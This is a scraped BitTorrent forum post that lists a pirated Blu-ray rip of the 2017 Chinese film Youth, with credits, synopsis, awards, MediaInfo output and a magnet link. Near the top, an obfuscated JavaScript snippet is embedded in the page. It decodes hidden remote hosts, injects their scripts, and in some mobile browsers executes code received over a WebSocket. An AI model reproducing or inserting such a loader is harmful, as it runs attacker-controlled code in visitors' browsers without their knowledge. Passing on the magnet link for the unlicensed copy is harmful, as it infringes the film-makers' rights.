芳华[国语配音/中文字幕].Youth.2017.1080p.BluRay.x265.10bit.DTS 6.63GB

版主小s 25天前 120

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 芳华 / 歌声离我远去 / Youth
◎年  代 2017
◎产  地 中国大陆
◎类  别 剧情 / 历史 / 战争
◎语  言 汉语普通话
◎上映日期 2017-12-15(中国大陆) / 2017-09-07(多伦多电影节)
◎IMDb链接 https://www.imdb.com/title/tt6654316/
◎豆瓣评分 7.7/10 (731770人评价)
◎豆瓣链接 https://movie.douban.com/subject/26862829/
◎片  长 136分钟
◎导  演 冯小刚 Xiaogang Feng (id:1274255)
◎编  剧 严歌苓 Geling Yan (id:1301405)
◎演  员 黄轩 Xuan Huang (id:1276105)
       苗苗 Miao Miao (id:1366978)
       钟楚曦 Elane Zhong (id:1357009)
       杨采钰 Caiyu Yang (id:1320350)
       李晓峰 Xiaofeng Li (id:1317104)
       王天辰 Tianchen Wang (id:1366846)
       王可如 Keru Wang (id:1366845)
       隋源 Drolma Suijun (id:1366847)
       张仁博 Renbo Zhang (id:1380587)
       苏岩 Yan Su (id:1309922)
       张国立 Guoli Zhang (id:1015115)
       赵立新 Lixin Zhao (id:1312817)
       周放 Fang Zhou (id:1313964)
       李静 Jing Li (id:1459747)
       罗攀 Pan Luo (id:1348389)
       杨烁 Shuo Yang (id:1386089)
       李彦漫 Yanman Li (id:1367133)
       郭沛志 Peizhi Guo (id:1415650)
       李卓航 Zhuohang Li (id:1405125)
       左懿 Amelia Yi Zuo (id:1454256)
       龚宇 Yu Gong (id:1406734)
       冯小刚 Xiaogang Feng (id:1274255)
       杜扬 Du Yang (id:1330983)
       王酩 Ming Wang (id:1300396)
       赵麟 Lin Zhao (id:1305090)
       罗攀 Pan Luo (id:1348389)
       张琪 Qi Zhang (id:1386934)
       刘晓莉 Xiaoli Liu (id:1382701)
       李言 Yan Li (id:1456204)
       何毅  (id:1460836)
       石海鹰 Haiying Shi (id:1335014)
       丁冀燕 Jiyan Ding (id:1415853)
       刘晓莉 Xiaoli Liu (id:1382701)
       郭沛志 Peizhi Guo (id:1415650)
       莫若琦 Mango Mok (id:1368933)
       温波 Bo Wen (id:1330581)
       涂灏 Hao Tu (id:1311569)

◎标  签 文艺 / 青春 / 人性 / 历史 / 战争 / 中国大陆 / 人生 / 剧情

◎简  介
  故事发生在上世纪七十年代,寄人篱下的少女何小萍(苗苗 饰)经过重重试炼终于加入了梦寐以求的文工团,哪知道这里和她曾经待过的那些地方并无不同,她依然得忍受遭人唾弃和欺侮的生活。唯一给过她温暖的,是刘峰(黄轩 饰),不仅仅是对何小萍,被称为“活雷锋”的刘峰把自己的爱情和温暖无私的奉献给每一个人。                                    
                                实际上,刘峰一直爱慕着美丽活泼的林丁丁(杨采钰 饰),当他选择将这份感情勇敢的表达出来时,却让自己的人生走向了完全不同的方向。战争开始了,刘峰、何小萍和萧穗子前赴后继的走上了前线,在枪弹和炮火之中,每一个人都在用生命和热血绽放着属于他们的芳华。

◎获奖情况 (共17项)
  第54届台北金马影展 (2017)
  金马奖 最佳改编剧本(提名)
   └──严歌苓 (id:1301405)
  金马奖 最佳新演员(提名)
   └──钟楚曦 (id:1357009)
  金马奖 最佳美术设计(提名)
   └──石海鹰 (id:1335014)
  金马奖 最佳造型设计(提名)
   └──刘晓莉 (id:1382701)

  第37届香港电影金像奖 (2018)
  最佳两岸华语电影(提名)

  第47届鹿特丹国际电影节 (2018)
  亚洲电影大奖(提名)
   └──冯小刚 (id:1274255)

  第12届亚洲电影大奖 (2018)
  最佳电影
  最佳导演(提名)
   └──冯小刚 (id:1274255)
  最佳新演员(提名)
   └──钟楚曦 (id:1357009)
  最佳编剧(提名)
   └──严歌苓 (id:1301405)
  最佳剪接(提名)
   └──张琪 (id:1386934)

  第1届平遥国际电影展 (2017)
  首映单元最受欢迎影片(提名)
   └──冯小刚 (id:1274255)

  第25届北京大学生电影节 (2018)
  最佳影片奖(提名)
  最佳导演奖
   └──冯小刚 (id:1274255)
  最佳新人奖

  第4届豆瓣电影年度榜单 (2017)
  评分最高的华语电影(提名)
  12月最受关注电影

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 73618201187567104980047055160996024117 (0x3762598D45E7C98DC44BA9F7F6D44F35)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 6.63 GiB
  8. Duration                                 : 2 h 15 min
  9. Overall bit rate                         : 7 007 kb/s
  10. Movie name                               : Youth - Blu-ray?
  11. Encoded date                             : UTC 2021-09-26 07:53:20
  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 2 h 15 min
  23. Bit rate                                 : 5 452 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 808 pixels
  26. Display aspect ratio                     : 2.40:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.146
  33. Stream size                              : 5.16 GiB (78%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=16.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x808 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Audio
  39. ID                                       : 2
  40. ID in the original source medium         : 4352 (0x1100)
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 2 h 15 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 509 kb/s
  47. Channel(s)                               : 6 channels
  48. Channel layout                           : C L R Ls Rs LFE
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 16 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.43 GiB (22%)
  54. Language                                 : Chinese
  55. Default                                  : Yes
  56. Forced                                   : No
  57. Original source medium                   : Blu-ray
  58. Text #1
  59. ID                                       : 3
  60. ID in the original source medium         : 4608 (0x1200)
  61. Format                                   : PGS
  62. Muxing mode                              : zlib
  63. Codec ID                                 : S_HDMV/PGS
  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  65. Duration                                 : 2 h 10 min
  66. Bit rate                                 : 25.1 kb/s
  67. Count of elements                        : 3389
  68. Stream size                              : 23.5 MiB (0%)
  69. Title                                    : chs
  70. Language                                 : Chinese
  71. Default                                  : Yes
  72. Forced                                   : No
  73. Original source medium                   : Blu-ray
  74. Text #2
  75. ID                                       : 4
  76. ID in the original source medium         : 4609 (0x1201)
  77. Format                                   : PGS
  78. Muxing mode                              : zlib
  79. Codec ID                                 : S_HDMV/PGS
  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  81. Duration                                 : 2 h 10 min
  82. Bit rate                                 : 25.7 kb/s
  83. Count of elements                        : 3389
  84. Stream size                              : 24.0 MiB (0%)
  85. Title                                    : cht
  86. Language                                 : Chinese
  87. Default                                  : No
  88. Forced                                   : No
  89. Original source medium                   : Blu-ray
  90. Text #3
  91. ID                                       : 5
  92. ID in the original source medium         : 4610 (0x1202)
  93. Format                                   : PGS
  94. Muxing mode                              : zlib
  95. Codec ID                                 : S_HDMV/PGS
  96. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  97. Duration                                 : 2 h 10 min
  98. Bit rate                                 : 34.7 kb/s
  99. Count of elements                        : 3394
  100. Stream size                              : 32.4 MiB (0%)
  101. Title                                    : eng
  102. Language                                 : English
  103. Default                                  : No
  104. Forced                                   : No
  105. Original source medium                   : Blu-ray
  106. Menu
  107. 00:00:00.000                             : 第 01 章
  108. 00:11:31.000                             : 第 02 章
  109. 00:25:06.958                             : 第 03 章
  110. 00:34:35.041                             : 第 04 章
  111. 00:45:28.375                             : 第 05 章
  112. 01:00:38.458                             : 第 06 章
  113. 01:10:57.583                             : 第 07 章
  114. 01:26:19.375                             : 第 08 章
  115. 01:39:52.333                             : 第 09 章
  116. 01:51:50.708                             : 第 10 章
  117. 01:58:36.291                             : 第 11 章
  118. 02:05:25.750                             : 第 12 章


TAGS 剧情 历史 战争

磁力链:
  • magnet:?xt=urn:btih:508B57B73A07B002600D89C0EDF2E152D16EA520
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回